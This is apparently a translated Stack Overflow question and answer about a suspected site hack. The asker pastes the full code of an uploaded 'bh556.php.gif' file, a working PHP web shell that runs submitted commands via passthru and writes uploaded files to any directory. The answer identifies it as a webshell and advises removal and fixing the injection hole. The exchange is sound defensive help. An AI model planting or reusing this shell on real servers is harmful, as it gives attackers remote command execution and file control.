我刚刚收到房东发来的热情信息,告诉我...... “我们检测到有人试图通过 http 或 ftp 访问您的帐户”
检查恶意文件后,有人上传了一个名为“bh556.php.gif”的图标
打开此文件,它包含以下代码:
<html>
<head>
<div align="left"><font size="1">Input command :</font></div>
<form name="cmd" method="POST" enctype="multipart/form-data">
<input type="text" name="cmd" size="30" class="input"><br>
<pre>
<?php
if ($_POST['cmd']){
$cmd = $_POST['cmd'];
passthru($cmd);
}
?>
</pre>
<hr>
<div align="left"><font size="1">Uploader file :</font></div>
<?php
$uploaded = $_FILES['file']['tmp_name'];
if (file_exists($uploaded)) {
$pwddir = $_POST['dir'];
$real = $_FILES['file']['name'];
$dez = $pwddir."/".$real;
copy($uploaded, $dez);
echo "FILE UPLOADED TO $dez";
}
?> </pre>
<form name="form1" method="post" enctype="multipart/form-data">
<input type="text" name="dir" size="30" value="<? passthru("pwd"); ?>">
<input type="submit" name="submit2" value="Upload">
<input type="file" name="file" size="15">
</td>
</tr>
</table>
</body>
</html>
谁能解释一下如何防止再次通过图标上传,并解释一下上面的代码到底做了什么?
最佳答案
这是一个 PHP Webshell,参见 here获取常见列表。它允许恶意用户通过 PHP 文件执行命令,这具有极大的危害性。
通过标题和一些巧妙的技巧将它们隐藏在图像中很常见,请参阅说明 here
我的建议是,删除文件,解决泄漏的原因,这可能是某种描述的注入(inject)攻击。
关于php - 可能的网站黑客尝试,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/28852904/